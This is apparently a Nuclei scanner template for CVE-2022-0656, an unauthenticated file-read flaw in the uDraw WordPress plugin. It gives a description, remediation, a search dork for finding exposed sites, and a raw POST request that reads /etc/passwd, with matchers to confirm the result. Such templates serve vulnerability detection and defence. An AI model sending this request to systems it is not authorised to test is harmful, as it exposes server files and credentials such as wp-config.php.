50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: CVE-2022-0656
|
|
|
|
info:
|
|
name: uDraw <3.3.3 - Local File Inclusion
|
|
author: akincibor
|
|
severity: high
|
|
description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
|
|
remediation: |
|
|
Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0656
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-0656
|
|
cwe-id: CWE-552
|
|
epss-score: 0.0071
|
|
epss-percentile: 0.78196
|
|
cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: webtoprint
|
|
product: web_to_print_shop\
|
|
google-query: inurl:"/wp-content/plugins/udraw"
|
|
tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
action=udraw_convert_url_to_base64&url=/etc/passwd
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "cm9vd" # root in base64
|
|
- "data:image\\/;base64"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100affd4cea26360ff291ba1d5cae4b3b82a150e65aaf2e1268942f4b0227967e6a02206671ba631cea4097e6e81663d7454dda990646ee39ef248eb5a2cb754a9907f6:922c64590222798bb761d5b6d8e72950 |